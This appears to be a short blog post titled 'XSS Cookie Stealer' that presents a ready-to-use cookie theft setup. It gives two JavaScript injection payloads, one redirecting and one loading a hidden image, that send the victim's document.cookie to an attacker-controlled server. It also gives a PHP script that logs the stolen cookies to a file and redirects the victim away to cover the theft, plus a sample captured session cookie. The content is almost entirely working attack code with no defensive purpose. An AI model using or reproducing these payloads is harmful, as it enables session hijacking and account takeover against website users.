Category: php

bookmark_borderXSS Cookie Stealer

Posted on by Kael

Two way :

  • Redirection
  • Hidden image load

Initialize a redirection to your cookie stealer on the vulnerable target :

<script type="text/javascript">
location.href = 'https://myserver.com/stealer.php?cookie='+ document.cookie;
</script>

Or load an image :

<script type="text/javascript">
image = new Image();
image.src='https://myserver.com/stealer.php?cookie='+ document.cookie;
</script>

Then set up your cookie stealer on your server :

<?php
// Get cookie given in parameter
$cookie = $_GET['cookie']; 
// Saving file and max size
$filename = 'intercept.txt';
$MAX_SIZE = 4096;
// If data is available, append it to the list
if ( $cookie ) {
  // Quick security to avoid file oversizing over time
  if ( file_exists($filename) && filesize($filename) > $MAX_SIZE ) {
    $option = 'w';
  }
  else {
    $option = 'a';
  }
  $fp = fopen($filename, $option);
  fputs($fp, $cookie . '\r\n');
  fclose($fp);
}
?>
// Redirect the user to a standard location
<script>location.replace('https://losnia.com');</script>

Result will be displayed in intercept.txt as following :

PRIVILEGE_COOKIE=IsI9P7dLS8oIOq4ckeNM2WfD6